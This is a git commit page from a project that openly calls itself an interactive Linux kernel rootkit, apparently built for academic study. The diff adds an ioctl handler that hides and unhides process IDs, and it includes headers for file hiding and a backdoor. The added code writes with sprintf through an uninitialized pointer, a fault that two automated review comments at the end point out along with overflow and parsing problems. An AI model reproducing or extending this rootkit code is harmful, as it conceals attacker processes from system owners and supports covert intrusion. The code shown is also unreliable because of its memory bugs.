linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 9e022750c9d494742ad7969f3ccdb0027b5f0825
parent 44190c61724e59f8e0b54deb09b4ac1f705998e6
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 29 Nov 2020 11:39:23 +0100

implements {,un}hidepid handling

Diffstat:
Msrc/channel.c | 22++++++++++++++++++++++
Msrc/hidepid.h | 2+-
2 files changed, 23 insertions(+), 1 deletion(-)

diff --git a/src/channel.c b/src/channel.c
@@ -7,6 +7,7 @@
 #include "common.h"
 #include "filehide.h"
 #include "backdoor.h"
+#include "hidepid.h"
 #include "ioctl.h"
 #include "rootkit.h"
@@ -133,6 +134,27 @@ handle_togglebd(unsigned long arg)
 int
 handle_hidepid(unsigned long arg)
 {
+	char *msg;
+	long sarg = (long)arg;
+
+	if (!sarg) {
+		unhide_pids();
+		rootkit.hiding_pids = false;
+		msg = "hidepid off";
+	} else if (sarg < 0) {
+		unhide_pid((pid_t)((-1) * sarg));
+		sprintf(msg, "unhiding pid %d", (pid_t)((-1) * sarg));
+	} else if (sarg > 0) {
+		if (!rootkit.hiding_files) {
+			DEBUG_NOTICE("hidepid on\n");
+			rootkit.hiding_pids = true;
+		}
+
+		hide_pid((pid_t)sarg);
+		sprintf(msg, "hiding pid %d", (pid_t)sarg);
+	}
+
+	DEBUG_NOTICE("%s\n", msg);
 	return 0;
 }
diff --git a/src/hidepid.h b/src/hidepid.h
@@ -3,7 +3,7 @@
 #include <linux/types.h>
-#define PID_FROM_NAME(name) (simple_strtoul((name), NULL, 10))
+#define PID_FROM_NAME(name) ((pid_t)simple_strtol((name), NULL, 10))
 typedef struct pid_list *pid_list_t_ptr;
 typedef struct pid_list {
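Review bot: `msg` is declared as an uninitialized `char *` and the `sarg < 0` and `sarg > 0` branches of handle_hidepid then write through it with `sprintf`, so the formatted text lands at whatever address happened to be in that stack slot; only the `!sarg` branch assigns the pointer before it is used. Give the message real storage and bound the writes: `char msg[32];`, `snprintf(msg, sizeof msg, "hidepid off");` in the first branch, and `snprintf(msg, sizeof msg, "unhiding pid %d", (pid_t)((-1) * sarg));` (likewise for the "hiding pid" line) in the other two. Separately, `(-1) * sarg` is signed overflow when `sarg` is `LONG_MIN`, and the `(pid_t)` casts silently truncate values outside the `int` range, so a range check before the casts would be worth adding if the ioctl argument is not already validated upstream — that is not visible in this hunk.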
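Review bot: `simple_strtol` accepts a leading sign and never reports a parse failure, so after this change `PID_FROM_NAME` can yield a negative or truncated `pid_t` for a name that is not a plain decimal number, and the caller cannot distinguish that from a genuine pid. If the names passed in are expected to be plain decimal pids, `int pid; if (kstrtoint(name, 10, &pid)) /* not a pid */` at the call site would reject such names instead of casting them; the macro itself cannot return an error. The `pid_list` struct that follows the macro continues outside the hunk.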